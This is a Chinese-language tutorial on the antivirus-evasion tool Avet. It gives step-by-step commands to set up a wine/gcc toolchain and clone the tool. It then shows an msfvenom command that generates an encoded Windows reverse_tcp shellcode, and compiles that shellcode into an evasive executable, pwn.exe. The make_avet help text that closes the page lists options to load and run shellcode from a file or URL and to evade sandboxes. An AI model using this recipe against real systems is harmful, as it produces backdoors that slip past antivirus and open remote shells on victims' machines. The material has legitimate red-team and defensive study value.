Avet免杀

简介:Avet是杀软绕过技术工具,同时也是2017拉斯维加斯黑帽大会的arsnal工具之一,可以配合msf生成的shellcode,编译成exe,达到免杀效果。

安装Avet

安装avet之前,需要利用 wine 安装tdm-gcc

下载tdm-gcc

从<https://sourceforge.net/projects/tdm-gcc/下载最新或者利用wget下载gcc5.1.0.2版本
wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe

安装tdm-gcc

wine tdm64-gcc-5.1.0-2.exe

默认安装

下载Avet

git clone https://github.com/govolution/avet

进入build目录,可以看到各种类型的payload

使用方法:

通过编辑对应的payload文件将lhost设置成kali的ip,lport为kali监听的端口

这里我们重新编译make_avet和sh_format,因为作者编译发布的make_avet是64位,如果是32位的,运行会报错,

gcc -o make_avet make_avet.c

gcc -o sh_format sh_format.c

注意运行的时候如果在build目录下运行会提示没有那个目录或文件

在根目录运行如图:

根目录生成pwn.exe文件

编译msfvenom生成的shellcode

使用msfvenom生成shellcode:

msfvenom -p windows/shell/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxx -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > life.txt

运行脚本:

.build/global_win32.sh
win32_comiler="wine gcc -m32"

[^编译目标平台位数]: win64_comiler=”wine gcc -m64”

./format.sh life.txt > life1.txt
./make_avet -f life1.txt -F –E
$win32_compiler -o pwn.exe avet.c

make_avet使用说明:

1
2
3
4
5
6
7
8
9
10
11
12
13

Anti Virus Evasion Make Tool by Daniel Sauder
use -h for help
Options:
-l load and exec shellcode from given file, call is with mytrojan.exe myshellcode.txt
-f compile shellcode into .exe, needs filename of shellcode file
-u load and exec shellcode from url using internet explorer (url is compiled into executable)
-E use avets ASCII encryption, often do not has to be used
Note: with -l -E is mandatory
-F use fopen sandbox evasion
-X compile for 64 bit
-p print debug information
-h help